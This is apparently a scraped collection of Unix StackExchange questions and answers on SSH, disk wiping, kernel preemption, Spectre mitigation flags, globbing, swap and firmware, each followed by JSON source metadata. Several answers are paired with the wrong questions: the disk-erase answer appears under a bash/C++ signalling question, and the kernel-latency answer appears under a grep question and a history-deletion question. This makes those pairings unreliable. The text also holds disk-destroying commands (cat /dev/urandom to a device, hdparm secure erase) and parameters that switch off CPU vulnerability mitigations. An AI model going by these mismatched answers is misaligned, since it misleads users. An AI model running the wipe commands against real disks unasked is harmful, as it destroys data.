ssb* rsa2048/56ABDJFDKFN
created: 2019-09-07 expires: 2021-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]>
...
gpg> save Don't forget to save the changes before quitting! | {
"source": [
"https://unix.stackexchange.com/questions/552713",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/216256/"
]
} |
552,723 | I am trying to do these in a script. I have to run some commands on a remote host. Currently, I am doing this: ssh root@host 'bash -s' < command1
ssh root@host 'bash -s' < command2
ssh root@host 'bash -s' < command3 However, this means that I have to connect to the server repeatedly, which is increasing a lot of time between processing of the commands. I am looking for something like this: varSession=$(ssh root@host 'bash -s')
varSeesion < command1
varSeesion < command2
varSeesion < command3 Again, I need to run these commands via a script. I have taken a look at screen but I am not sure if it can be used in a script. | You can use a ControlMaster and ControlPersist to allow a connection to persist after the command has terminated: When used in conjunction with ControlMaster , specifies that the
master connection should remain open in the background (waiting for
future client connections) after the initial client connection has
been closed. If set to no , then the master connection will not be
placed into the background, and will close as soon as the initial
client connection is closed. If set to yes or 0 , then the master
connection will remain in the background indefinitely (until killed or
closed via a mechanism such as the “ ssh -O exit ”). If set to a time
in seconds, or a time in any of the formats documented in sshd_config(5) , then the backgrounded master connection will
automatically terminate after it has remained idle (with no client
connections) for the specified time. So, the first SSH command will setup a control file for the connection, and the other two will reuse that connection via that control file. Your ~/.ssh/config should have something like: Host host
User root
ControlMaster auto
ControlPath /tmp/ssh-control-%C
ControlPersist 30 # or some safe timeout And your script won't need any other changes. | {
"source": [
"https://unix.stackexchange.com/questions/552723",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/376320/"
]
} |
552,809 | I'd like to know if apk add is capable of automatically assuming yes to any prompts when installing a new package on Alpine Linux? I'm familiar with running something like apt-get install -y curl on Ubuntu and wondering if there's an equivalent command for my use case. | apk does not need a --yes argument as it is designed to run non-interactively from the get-go and does not prompt the user unless the -i / --interactive argument is given (and then only for "certain operations"). Ref apk --help --verbose . | {
"source": [
"https://unix.stackexchange.com/questions/552809",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/382529/"
]
} |
553,143 | I need to securely erase harddisks from time to time and have used a variety of tools to do this: cat /dev/zero > /dev/disk cat /dev/urandom > /dev/disk shred badblocks -w DBAN All of these have in common that they take ages to run. In one case cat /dev/urandom > /dev/disk killed the disk, apparently overheating it. Is there a "good enough" approach to achieve that any data on the disk is made unusable in a timely fashion? Overwriting superblocks and a couple of strategically important blocks or somesuch? The disks (both, spinning and ssd) come from donated computers and will be used to install Linux-Desktops on them afterwards, handed out to people who can't afford to buy a computer, but need one. The disks of the donated computers will usually not have been encrypted. And sometimes donors don't even think of deleting files beforehand. Update : From the answers that have come in so far, it seems there is no cutting corners.
My best bet is probably setting up a lab-computer to erase multiple disks at once. One more reason to ask big companies for donations :-) Thanks everyone! | Overwriting the superblock or partition table just makes it inconvenient to reconstruct the data, which is obviously still there if you just do a hex dump. Hard disks have a built-in erasing feature: ATA Secure Erase , which you can activate using hdparm : Pick a password (any password): hdparm --user-master u --security-set-pass hunter1 /dev/sd X Initiate erasure: hdparm --user-master u --security-erase hunter1 /dev/sd X Since this is a built-in feature, it is unlikely that you'll find a faster method that actually offers real erasure. (It's up to you, though, to determine whether it meets your level of paranoia.) Alternatively, use the disk with full-disk encryption, then just throw away the key when you want to dispose of the data. | {
"source": [
"https://unix.stackexchange.com/questions/553143",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/364705/"
]
} |
553,146 | I was wondering about a clean elegant way to do the following:
Let's say I have written a C++ program, called foo , running inside as part of a shell script, called bar.sh . I'd like for the shell script to run foo as a background process, and then wait until the foo execution reaches a line of my choosing, at which point bar should continue execution. For the sake of clarity, here's a dummy example of bar.sh : #!/bin/bash
./foo
wait
echo "WAKING UP" Here is foo : #include <iostream>
int main(){
for (int i = 0; i < 1000000; i++){
std::cout << i << std::endl;
if (i == 50){
//Wake up bash!
}
}
} I want to modify foo and/or bar so that the wait command in bar will stop when foo is at iteration 50 let's say. So when the for loop in foo reaches i = 50 , bar should then awaken and print WAKING UP. Of course, foo can continue to keep running. How can I modify these programs to achieve this sort of effect? | Overwriting the superblock or partition table just makes it inconvenient to reconstruct the data, which is obviously still there if you just do a hex dump. Hard disks have a built-in erasing feature: ATA Secure Erase , which you can activate using hdparm : Pick a password (any password): hdparm --user-master u --security-set-pass hunter1 /dev/sd X Initiate erasure: hdparm --user-master u --security-erase hunter1 /dev/sd X Since this is a built-in feature, it is unlikely that you'll find a faster method that actually offers real erasure. (It's up to you, though, to determine whether it meets your level of paranoia.) Alternatively, use the disk with full-disk encryption, then just throw away the key when you want to dispose of the data. | {
"source": [
"https://unix.stackexchange.com/questions/553146",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/292999/"
]
} |
553,731 | We can see that the synopsis of rm command is: rm [OPTION]... [FILE]... Doesn't it mean that we can use only rm command without any option or argument? When I run the command rm on its own, the terminal then shows the following error: rm: missing operand
Try 'rm --help' for more information. Can anyone tell me why this is the case? | The standard synopsis for the rm utility is specified in the POSIX standard 1&2 as rm [-iRr] file...
rm -f [-iRr] [file...] In its first form, it does require at least one file operand, but in its second form it does not. Doing rm -f with no file operands is not an error: $ rm -f
$ echo "$?"
0 ... but it just doesn't do very much. The standard says that for the -f option, the rm utility should... Do not prompt for confirmation. Do not write diagnostic messages or modify the exit status in the case of no file operands, or in the case of operands that do not exist. Any previous occurrences of the -i option shall be ignored. This confirms that it must be possible to run rm -f without any pathname operands and that this is not something that makes rm exit with a diagnostic message nor a non-zero exit status. This fact is very useful in a script that tries to delete a number of files as rm -f -- "$@" where "$@" is a list of pathnames that may or may not be empty, or that may contain pathnames that do not exist. ( rm -f will still generate a diagnostic message and exit with a non-zero exit status if there are permission issues preventing a named file from being removed.) Running the utility with neither option nor pathname operands is an error though: $ rm
usage: rm [-dfiPRrv] file ...
$ echo "$?"
1 The same holds true for GNU rm (the above shows OpenBSD rm ) and other implementations of the same utility, but the exact diagnostic message and the non-zero exit-status may be different (on Solaris the value is 2, and on macOS it's 64, for example). In conclusion, the GNU rm manual may just be a bit imprecise as it's true that with some option ( -f , which is an optional option), the pathname operand is optional. 1 since the 2016 edition, after resolution of this bug , see the previous edition for reference. 2 POSIX is the standard that defines what a Unix system is and how it behaves. This standard is published by The Open Group . See also the question " What exactly is POSIX? ". | {
"source": [
"https://unix.stackexchange.com/questions/553731",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/383308/"
]
} |
553,980 | I can't find any good information on the rt and lowlatency Linux kernels. I am wondering why anybody would not want to use a lowlatency kernel. Also, if anyone can tell what the specific differences are, that would be great too. | The different configurations, “generic”, “lowlatency” (as configured in Ubuntu), and RT (“real-time”), are all about balancing throughput versus latency. Generic kernels favour throughput over latency, the others favour latency over throughput. Thus users who need throughput more than they need low latency wouldn’t choose a low latency kernel. Compared to the generic configuration, the low-latency kernel changes the following settings: IRQs are threaded by default, meaning that more IRQs (still not all IRQs) can be pre-empted, and they can also be prioritised and have their CPU affinity controlled; pre-emption is enabled throughout the kernel ( CONFIG_PREEMPT instead of CONFIG_PREEMPT_VOLUNTARY ); the latency debugging tools are enabled, so that the user can determine what kernel operations are blocking progress; the timer frequency is set to 1000 Hz instead of 250 Hz . RT kernels add a number of patches to the mainline kernel, and a few more configuration tweaks. The purpose of most of those patches is to allow more opportunities for pre-emption, by removing or splitting up locks, and to reduce the amount of time the kernel spends handling uninterruptible tasks (notably, by improving the logging mechanisms and using them less). The goal of all this is to allow the kernel to meet deadlines , i.e. ensure that, when it is required to handle something, it isn’t busy doing something else; this isn’t the same as high throughput or low latency, but fixing latency issues helps. The generic kernels, as configured by default in most distributions, are designed to be a “sensible” compromise: they try to ensure that no single task can monopolise the system for too long, and that tasks can switch reasonably frequently, but without compromising throughput — because the more time the kernel spends considering whether to switch tasks (inside or outside the kernel), or handling interrupts, the less time the system as a whole can spend “working”. That compromise isn’t good enough for latency-sensitive workloads such as real-time audio or video processing: for those, low-latency kernels provide lower latencies at the expense of some throughput. And for real-time requirements, the real-time kernels remove as many low-latency-blockers as possible, at the expense of more throughput. Main-stream distributions of Linux are mostly installed on servers, where traditionally latency hasn’t been considered all that important (although if you do percentile performance analysis, and care about top percentile performance, you might disagree), so the default kernels are quite conservative. Desktop users should probably use the low-latency kernels, as suggested by the kernel’s own documentation. In fact, the more low-latency kernels are used, the more feedback there will be on their relevance, which helps get generally-applicable improvements into the default kernel configurations; the same goes for the RT kernels (many of the RT patches are intended, at some point, for the mainstream kernel). This presentation on the topic provides quite a lot of background. Since version 5.12 of the Linux kernel, “dynamic preemption” can be enabled; this allows the default preemption model to be overridden on the kernel command-line, using the preempt= parameter. This currently supports none (server), voluntary (desktop), and full (low-latency desktop). | {
"source": [
"https://unix.stackexchange.com/questions/553980",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/73671/"
]
} |
554,007 | All I need is the Zip file name.
In the first step I searched for the author: egrep -ni -B1 --color "$autor: test_autor" file_search_v1.log > result1.log whatever worked, the result was: zip: /var/www/dir_de/html/dir1/dir2/7890971.zip author: test_autor zip: /var/www/dir_de/html/dir1/dir2/10567581.zip author: test_autor But, as mentioned above, the Ziip file name.
In the second step I tried to filter the result of the first search again: egrep -ni -B1 --color "$autor: test_autor" file_search_v1.log | xargs grep -i -o "\/[[:digit:]]]\.zip" to search only for the filename, unfortunately this does not work. My question.
How should the second grep filter "look" so that I only get the zip file name? | The different configurations, “generic”, “lowlatency” (as configured in Ubuntu), and RT (“real-time”), are all about balancing throughput versus latency. Generic kernels favour throughput over latency, the others favour latency over throughput. Thus users who need throughput more than they need low latency wouldn’t choose a low latency kernel. Compared to the generic configuration, the low-latency kernel changes the following settings: IRQs are threaded by default, meaning that more IRQs (still not all IRQs) can be pre-empted, and they can also be prioritised and have their CPU affinity controlled; pre-emption is enabled throughout the kernel ( CONFIG_PREEMPT instead of CONFIG_PREEMPT_VOLUNTARY ); the latency debugging tools are enabled, so that the user can determine what kernel operations are blocking progress; the timer frequency is set to 1000 Hz instead of 250 Hz . RT kernels add a number of patches to the mainline kernel, and a few more configuration tweaks. The purpose of most of those patches is to allow more opportunities for pre-emption, by removing or splitting up locks, and to reduce the amount of time the kernel spends handling uninterruptible tasks (notably, by improving the logging mechanisms and using them less). The goal of all this is to allow the kernel to meet deadlines , i.e. ensure that, when it is required to handle something, it isn’t busy doing something else; this isn’t the same as high throughput or low latency, but fixing latency issues helps. The generic kernels, as configured by default in most distributions, are designed to be a “sensible” compromise: they try to ensure that no single task can monopolise the system for too long, and that tasks can switch reasonably frequently, but without compromising throughput — because the more time the kernel spends considering whether to switch tasks (inside or outside the kernel), or handling interrupts, the less time the system as a whole can spend “working”. That compromise isn’t good enough for latency-sensitive workloads such as real-time audio or video processing: for those, low-latency kernels provide lower latencies at the expense of some throughput. And for real-time requirements, the real-time kernels remove as many low-latency-blockers as possible, at the expense of more throughput. Main-stream distributions of Linux are mostly installed on servers, where traditionally latency hasn’t been considered all that important (although if you do percentile performance analysis, and care about top percentile performance, you might disagree), so the default kernels are quite conservative. Desktop users should probably use the low-latency kernels, as suggested by the kernel’s own documentation. In fact, the more low-latency kernels are used, the more feedback there will be on their relevance, which helps get generally-applicable improvements into the default kernel configurations; the same goes for the RT kernels (many of the RT patches are intended, at some point, for the mainstream kernel). This presentation on the topic provides quite a lot of background. Since version 5.12 of the Linux kernel, “dynamic preemption” can be enabled; this allows the default preemption model to be overridden on the kernel command-line, using the preempt= parameter. This currently supports none (server), voluntary (desktop), and full (low-latency desktop). | {
"source": [
"https://unix.stackexchange.com/questions/554007",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/321126/"
]
} |
554,008 | Is there any command or way to remove all entries from history of bash shell containing a particular string? this will be useful to remove commands in history containing password.
I know we can remove each history entry by its number but the issue is it deletes only one entry at a time and I need to take out number each time to remove a new entry. eg. History command shows 5 entries containing password abcabc and I want to remove all the entries from history command containing string abcabc 975 2019-03-15 11:20:30 ll
976 2019-03-15 11:20:33 ll cd
977 2019-03-15 11:20:36 ll CD
978 2019-03-15 11:20:45 chown test1:test1 CD
979 2019-03-15 11:20:53 chown test1:test1 ./CD
980 2019-03-15 11:20:57 chown test1:test1 .\CD
981 2019-03-15 11:22:04 cd /tmp/logs/
982 2019-06-07 10:36:33 su test1
983 2019-08-22 08:35:10 su user1
984 2019-08-22 08:35:15 /opt/abc/legacy.exe -password abcabc
985 2019-09-24 07:20:45 cd /opt/test1/v6r2017x
986 2019-09-24 07:20:46 ll
987 2019-09-24 07:21:18 cd /tmp/
988 2019-09-24 07:21:19 ll
989 2019-09-24 07:21:24 cd linux_a64/
990 2019-09-24 07:21:25 /opt/abc/legacy.exe -password abcabc
991 2019-09-24 07:24:03 cd build/
992 2019-09-24 07:24:04 ll
993 2019-09-24 07:24:07 cd ..
994 2019-09-24 07:24:10 /opt/abc/legacy.exe -password abcabc
995 2019-09-24 07:24:15 cd someapp/bin
996 2019-09-24 07:24:21 ll
997 2019-09-24 07:24:33 cd .
998 2019-09-24 07:24:35 cd ..
999 2019-09-24 07:24:36 ll Tried following command which gave error as given below servername:~ # sed -i 'g/abcabc/d' /home/user1/.bash_history
sed: -e expression #1, char 2: extra characters after command Expectation : No error and all the entries containing string abcabc should be removed. | The different configurations, “generic”, “lowlatency” (as configured in Ubuntu), and RT (“real-time”), are all about balancing throughput versus latency. Generic kernels favour throughput over latency, the others favour latency over throughput. Thus users who need throughput more than they need low latency wouldn’t choose a low latency kernel. Compared to the generic configuration, the low-latency kernel changes the following settings: IRQs are threaded by default, meaning that more IRQs (still not all IRQs) can be pre-empted, and they can also be prioritised and have their CPU affinity controlled; pre-emption is enabled throughout the kernel ( CONFIG_PREEMPT instead of CONFIG_PREEMPT_VOLUNTARY ); the latency debugging tools are enabled, so that the user can determine what kernel operations are blocking progress; the timer frequency is set to 1000 Hz instead of 250 Hz . RT kernels add a number of patches to the mainline kernel, and a few more configuration tweaks. The purpose of most of those patches is to allow more opportunities for pre-emption, by removing or splitting up locks, and to reduce the amount of time the kernel spends handling uninterruptible tasks (notably, by improving the logging mechanisms and using them less). The goal of all this is to allow the kernel to meet deadlines , i.e. ensure that, when it is required to handle something, it isn’t busy doing something else; this isn’t the same as high throughput or low latency, but fixing latency issues helps. The generic kernels, as configured by default in most distributions, are designed to be a “sensible” compromise: they try to ensure that no single task can monopolise the system for too long, and that tasks can switch reasonably frequently, but without compromising throughput — because the more time the kernel spends considering whether to switch tasks (inside or outside the kernel), or handling interrupts, the less time the system as a whole can spend “working”. That compromise isn’t good enough for latency-sensitive workloads such as real-time audio or video processing: for those, low-latency kernels provide lower latencies at the expense of some throughput. And for real-time requirements, the real-time kernels remove as many low-latency-blockers as possible, at the expense of more throughput. Main-stream distributions of Linux are mostly installed on servers, where traditionally latency hasn’t been considered all that important (although if you do percentile performance analysis, and care about top percentile performance, you might disagree), so the default kernels are quite conservative. Desktop users should probably use the low-latency kernels, as suggested by the kernel’s own documentation. In fact, the more low-latency kernels are used, the more feedback there will be on their relevance, which helps get generally-applicable improvements into the default kernel configurations; the same goes for the RT kernels (many of the RT patches are intended, at some point, for the mainstream kernel). This presentation on the topic provides quite a lot of background. Since version 5.12 of the Linux kernel, “dynamic preemption” can be enabled; this allows the default preemption model to be overridden on the kernel command-line, using the preempt= parameter. This currently supports none (server), voluntary (desktop), and full (low-latency desktop). | {
"source": [
"https://unix.stackexchange.com/questions/554008",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/266985/"
]
} |
554,908 | Can I disable Spectre and Meltdown mitigation features in Ubuntu 18.04LTS? I want to test how much more performance I gain when I disable these two features in Linux, and if the performance is big, to make it permanently. | A number of kernel boot parameters are available to disable or fine-tune hardware vulnerability mitigations: for Spectre v1 and v2 : nospectre_v1 (x86, PowerPC), nospectre_v2 (x86, PowerPC, S/390, ARM64), spectre_v2_user=off (x86) for SSB: spec_store_bypass_disable=off (x86, PowerPC), ssbd=force-off (ARM64) for L1TF : l1tf=off (x86) for MDS : mds=off (x86) for TAA : tsx_async_abort=off for iTLB multihit : kvm.nx_huge_pages=off for SRBDS : srbds=off for retbleed: retbleed=off KPTI can be disabled with nopti (x86, PowerPC) or kpti=0 (ARM64) A meta-parameter, mitigations , was introduced in 5.2 and back-ported to 5.1.2, 5.0.16, and 4.19.43 (and perhaps others). It can be used to control all mitigations, on all architectures, as follows: mitigations=off will disable all optional CPU mitigations; mitigations=auto (the default setting) will mitigate all known CPU vulnerabilities, but leave SMT enabled (if it is already); mitigations=auto,nosmt will mitigate all known CPU vulnerabilities and disable SMT if appropriate. Some of these can be toggled at runtime; see the linked documentation for details. | {
"source": [
"https://unix.stackexchange.com/questions/554908",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/149626/"
]
} |
555,047 | I have a directory foo with several files: .
└── foo
├── a.txt
└── b.txt and I want to move it into a directory with the same name: .
└── foo
└── foo
├── a.txt
└── b.txt I'm currently creating a temporary directory bar , move foo into bar and rename bar to foo afterwards: mkdir bar
mv foo bar
mv bar foo But this feels a little cumbersome and I have to pick a name for bar that's not already taken. Is there a more elegant or straight-forward way to achieve this? I'm on macOS if that matters. | To safely create a temporary directory in the current directory, with a name that is not already taken, you can use mktemp -d like so: tmpdir=$(mktemp -d "$PWD"/tmp.XXXXXXXX) # using ./tmp.XXXXXXXX would work too The mktemp -d command will create a directory at the given path, with the X -es at the end of the pathname replaced by random alphanumeric characters. It will return the pathname of the directory that was created, and we store this value in tmpdir . 1 This tmpdir variable could then be used when following the same procedure that you are already doing, with bar replaced by "$tmpdir" : mv foo "$tmpdir"
mv "$tmpdir" foo
unset tmpdir The unset tmpdir at the end just removes the variable. 1 Usually, one should be able to set the TMPDIR environment variable to a directory path where one wants to create temporary files or directories with mktemp , but the utility on macOS seems to work subtly differently with regards to this than the same utility on other BSD systems, and will create the directory in a totally different location. The above would however work on macOS. Using the slightly more convenient tmpdir=$(TMPDIR=$PWD mktemp -d) or even tmpdir=$(TMPDIR=. mktemp -d) would only be an issue on macOS if the default temporary directory was on another partition and the foo directory contained a lot of data (i.e. it would be slow). | {
"source": [
"https://unix.stackexchange.com/questions/555047",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/295479/"
]
} |
555,208 | I recently purchased a i5-9600K . Which is supposed to run 6 cores and 6 threads (hyperthreading), when I take a look into /proc/cpuinfo the ht flag is on, and checking a tool like htop only shows 6 cores, as you can see in the image below. I've used other Intel and AMD processors, and usually when the product says 6 cores/6 threads the total amount is 12 , but in this case I see just 6 . Am I wrong or what could be the problem? Thank you! | If you scroll down on your CPU’s Ark page , you’ll see that it says Intel® Hyper-Threading Technology ‡ No Your CPU has six cores, but it doesn’t support hyper-threading, so your htop display is correct. The CPU specifications on Ark show the full thread count, there’s no addition or multiplication involved; see for example the Xeon E3-1245v3 for a hyper-threading-capable CPU (four cores, two threads per core, for eight threads in total). The ht moniker given to the underlying CPUID flag is somewhat misleading: in Intel’s manual (volume 3A, section 8.6), it’s described as “Indicates when set that the physical package is capable of supporting Intel Hyper-Threading Technology and/or multiple cores”. So its presence indicates that the CPU supports hyper-threads (even if they’re disabled), or contains multiple cores in the same package, or both. To determine what is really present, you need to enumerate the CPUs in the system, using firmware-provided information, and use the information given to figure out whether there are multiple logical cores, on how many physical cores, on how many sockets, etc. Depending on the CPU, a “CPU” shown in htop (and other tools) can be a thread (on a hyper-threading system), a physical core (on a non-hyper-threading system), or even a full package (on a non-hyper-threading, single-core system). The Linux kernel does all this detection for you, and you can see the result using for example lscpu . At least your CPU isn’t affected by any of the hyperthreading-related vulnerabilities! | {
"source": [
"https://unix.stackexchange.com/questions/555208",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/384590/"
]
} |
555,257 | I am trying to get x amount of file names printed from highest line count to lowest. ATM i have this wc -l /etc/*.conf |sort -rn | head -6 | tail -5 | and i get this 543 /etc/ltrace.conf
523 /etc/sensors3.conf
187 /etc/pnm2ppa.conf
144 /etc/ca-certificates.conf Now this would be ok but i only need the names, is there any way of removing the number of lines? | If you scroll down on your CPU’s Ark page , you’ll see that it says Intel® Hyper-Threading Technology ‡ No Your CPU has six cores, but it doesn’t support hyper-threading, so your htop display is correct. The CPU specifications on Ark show the full thread count, there’s no addition or multiplication involved; see for example the Xeon E3-1245v3 for a hyper-threading-capable CPU (four cores, two threads per core, for eight threads in total). The ht moniker given to the underlying CPUID flag is somewhat misleading: in Intel’s manual (volume 3A, section 8.6), it’s described as “Indicates when set that the physical package is capable of supporting Intel Hyper-Threading Technology and/or multiple cores”. So its presence indicates that the CPU supports hyper-threads (even if they’re disabled), or contains multiple cores in the same package, or both. To determine what is really present, you need to enumerate the CPUs in the system, using firmware-provided information, and use the information given to figure out whether there are multiple logical cores, on how many physical cores, on how many sockets, etc. Depending on the CPU, a “CPU” shown in htop (and other tools) can be a thread (on a hyper-threading system), a physical core (on a non-hyper-threading system), or even a full package (on a non-hyper-threading, single-core system). The Linux kernel does all this detection for you, and you can see the result using for example lscpu . At least your CPU isn’t affected by any of the hyperthreading-related vulnerabilities! | {
"source": [
"https://unix.stackexchange.com/questions/555257",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/384642/"
]
} |
555,746 | Because I spend most of my life in the IPython shell, I have a bad habit of prepending terminal commands with exclamation points. Usually, this just leads to an error, but sometimes, it causes something bad to happen. Can I effectively disable the ! functionality in my terminal? And would this risk interfering with any scripts? | In interactive shells, by default, ! is used for history expansion: the shell will look for a command matching the text following ! , and execute that. As indicated in this answer to Can't use exclamation mark (!) in bash? shells allow history expansion to be disabled: Bash: set +H Zsh: set -K If you never want to use history expansion driven by exclamation marks, you can add these to your shell’s startup scripts. These won’t cause ! to be ignored, but they will avoid running commands from your history. !command will complain that !command doesn’t exist. Shell scripts aren’t affected by these settings, they get their own shells with a non-interactive configuration (which doesn’t include history expansion by default). | {
"source": [
"https://unix.stackexchange.com/questions/555746",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/181903/"
]
} |
556,441 | What specifically can Linux do when it has swap that it can't without swap? For this question I want to focus on the difference between for example, a Linux PC with 32 GB RAM and no swap vs. a near identical Linux PC with 16 GB RAM with 16 GB swap. Note I am not interested in the "yes, but you could see X improvement if you add swap to the 32 GB PC" . That's off-topic for this question. I first encountered the opinion that adding swap can be better than adding RAM in comments to an earlier problem . I have of course read through this: Do I need swap space if I have more than enough amount of RAM? and... Answers are mostly focussed on adding swap, for example discussing disk caching where adding RAM would of course also extend the disk cache. There is some mention of defragmentation only being possible with swap, but I can't find evidence to back this up. I see some reference to MAP_NORESERVE for mmap , but this seems a very specific and obscure risk only associated with OOM situations and possibly only private mmap. Swap is often seen as a cheap way to extend memory or improve performance. But when mass producing embedded Linux devices this is turned on its head... ... In that case swap will wear flash memory, causing it to fail years before the end of warranty. Where doubling the RAM is a couple of extra dollars on the device. Note that's eMMC flash NOT an SSD! . Typically eMMC flash does not have wearleveling technology meaning it wears MUCH faster than SSDs There does seem to be a lot of hotly contested opinion on this matter . I am really looking for dry facts on capabilities, not "should you / shouldn't you" opinions. What can be done with swap which would not also be done by adding RAM? | Hibernation (or suspend to disk). Real hibernation powers off the system completely, so contents of RAM are lost, and you have to save the state to some persistent storage. AKA Swap. Unlike Windows with hiberfil.sys and pagefile.sys , Linux uses swap space for both over-committed memory and hibernation. On the other hand, hibernation seems a bit finicky to get to work well on Linux. Whether you "can" actually hibernate is a different thing. ¯\_(ツ)_/¯ | {
"source": [
"https://unix.stackexchange.com/questions/556441",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/20140/"
]
} |
556,545 | I'm doing some stuff with audio files, most but not all of which are mp3 files. Now I want to run some commands on only the files which are not mp3 files, or only those which don't have a .mp3 extension. I consider myself pretty good at regular expressions, but not so much at file globbing, which is subtly different in unexpected ways. I looked around and learned from other SO & SE answers that Bash has "extended globbing" that allows me to do this: file ../foo/bar/*.!(mp3) But some of my filenames have dots in them besides the one forming the filename extension: ../foo/bar/Naked_Scientists_Show_19.10.15.mp3
../foo/bar/YWCS_ep504-111519-pt1_5ej4_41cc9320.mp3_42827d48daefaa81ec09202e67fa8461_24419113.mp3
../foo/bar/eLife_Podcast_19.09.26.mp3
../foo/bar/gdn.sci.080428.bg.science_weekly.mp3 It seems the glob matches from the first dot onward, rather than from the last dot. I looked at the documentation but it seems they are far less powerful than regexes. But I didn't really grok everything as I don't spend that much time on *nix shells. Have I missed some way that I can still do this with Bash globbing? If not, a way to achieve the same thing with find or some other tool would still be worth knowing. | *.!(mp3) matches on foo.bar.mp3 because that's foo. followed by bar.mp3 which is not mp3 . You want !(*.mp3) here, which matches anything that doesn't end in .mp3 . If you want to match files whose name contains at least one . (other than a leading one which would make them a hidden file) but don't end in .mp3 , you could do !(*.mp3|!(*.*)) . In any case, note that unless your bash was built with --enable-extended-glob-default , you'll need to shopt -s extglob for that ksh glob operator to be available. | {
"source": [
"https://unix.stackexchange.com/questions/556545",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/6648/"
]
} |
556,677 | I purchased a Human Machine Interface (Exor Esmart04). Running on Linux 3.10.12, however this Linux is stripped down and does not have a C compiler. Another problem is the disk space: I've tried to install GCC on it but I do not have enough disk space for this, does anyone have other solutions or other C compilers which require less disk space? | Usually, for an embedded device, one doesn't compile software directly on it. It's more comfortable to do what is called cross-compilation which is, in short, compiling using your regular PC to another architecture than x86. You said you're new to Linux; just for your information, you're facing a huge problem: cross-compiling to embedded devices is not an easy job. I researched your HMI system and noticed some results that are talking about Yocto. Yocto is, in short, a whole framework to build firmware for embedded devices. Since your HMI massively uses Open Source projects (Linux, probably busybox, etc.) the manufacturer must provide you a way to rebuild all the open source components by yourself.
Usually, what you need to do that is the BSP ( Board Support Package ).
Hardware manufacturer usually ship it: Using buildroot project that allows you to rebuild your whole firmware from scratch. Using yocto meta that, added to a fresh copy of the corresponding yocto project, will allow you to rebuild your whole firmware too. More rarely, a bunch of crappy scripts and pre-built compiler. So, if I was you, I would: Contact the manufacturer support to ask for the stuff to rebuild the firmware as implied by the use of Open Source. In parallel, search Google for "your HMI + yocto", "your HMI + buildroot", etc. After Googling even more, I found out a Yocto meta on github . You can check the machines implemented by this meta upon the directory conf/machine of the meta. There's currently five machines defined under the following codenames: us01-kit us02-kit us03-kit usom01 usom02 So I suggest that you dig into this. This is probably the way you can build software by yourself.
You can also check this page on the github account that may give you some more clues. | {
"source": [
"https://unix.stackexchange.com/questions/556677",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/385559/"
]
} |
556,946 | I am getting these warnings every time I update my initramfs image(-s) with update-initramfs on my Dell PowerEdge T20 server running GNU/Linux Debian Buster 10. 0 . Is there a fix? W: Possible missing firmware /lib/firmware/i915/bxt_dmc_ver1_07.bin for module i915
W: Possible missing firmware /lib/firmware/i915/skl_dmc_ver1_27.bin for module i915
W: Possible missing firmware /lib/firmware/i915/kbl_dmc_ver1_04.bin for module i915
W: Possible missing firmware /lib/firmware/i915/cnl_dmc_ver1_07.bin for module i915
W: Possible missing firmware /lib/firmware/i915/glk_dmc_ver1_04.bin for module i915
W: Possible missing firmware /lib/firmware/i915/kbl_guc_ver9_39.bin for module i915
W: Possible missing firmware /lib/firmware/i915/bxt_guc_ver9_29.bin for module i915
W: Possible missing firmware /lib/firmware/i915/skl_guc_ver9_33.bin for module i915
W: Possible missing firmware /lib/firmware/i915/kbl_huc_ver02_00_1810.bin for module i915
W: Possible missing firmware /lib/firmware/i915/bxt_huc_ver01_07_1398.bin for module i915
W: Possible missing firmware /lib/firmware/i915/skl_huc_ver01_07_1398.bin for module i915 | For a general solution, apt-file is your way to solve the Possible missing firmware... warning. E.g.: apt-file search bxt_dmc
firmware-misc-nonfree: /lib/firmware/i915/bxt_dmc_ver1.bin
firmware-misc-nonfree: /lib/firmware/i915/bxt_dmc_ver1_07.bin Showing that the package firmware-misc-nonfree provides the missing firmware. Installing the firmware-linux package solves the problem because firmware-linux depends on firmware-linux-nonfree which depends on firmware-misc-nonfree . Detailed instructions: Add non-free to your /etc/apt/sources.list : deb http://deb.debian.org/debian buster main contrib non-free
deb http://deb.debian.org/debian-security/ buster/updates main contrib non-free
deb http://deb.debian.org/debian buster-updates main contrib non-free Install apt-file : sudo apt update
sudo apt install apt-file
sudo apt-file update Debian: apt-file | {
"source": [
"https://unix.stackexchange.com/questions/556946",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/126755/"
]
} |
557,800 | Normally, to zip a directory, I can do something like this: zip -r archive.zip directory/ However, if I try to remove the extension from archive.zip like this: zip -r archive directory/ It implicitly appends the .zip extension to the output. Is there a way to do this without creating a .zip and then renaming it? I'm using this version of zip on Ubuntu 18.04: Copyright (c) 1990-2008 Info-ZIP - Type 'zip "-L"' for software license.
This is Zip 3.0 (July 5th 2008), by Info-ZIP. | The -A ( --adjust-sfx ) option causes zip to treat the given archive name as-is: zip -Ar archive directory/ This works even when archive isn’t created as a self-extracting archive. | {
"source": [
"https://unix.stackexchange.com/questions/557800",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/279720/"
]
} |
557,822 | I thought this would do the trick: find src -type f -regextype egrep -regex '.*(?<!\.d)\.ts' But it doesn't seem to be matching anything. I think that should work, but I guess this "egrep" flavor doesn't support negative backreferences unless I didn't escape something properly. For reference, % find src -type f
src/code-frame.d.ts # <-- I want to filter this out
src/foo.ts
src/index.ts Is there another quick way to filter out .d.ts files from my search results? % find --version
find (GNU findutils) 4.7.0-git | I don't believe egrep supports that syntax (your expression is a Perl compatible regular expression). But you don't need to use regular expressions in your example, just have multiple -name tests and apply a ! negation as appropriate: find src -type f -name '*.ts' ! -name '*.d.ts' | {
"source": [
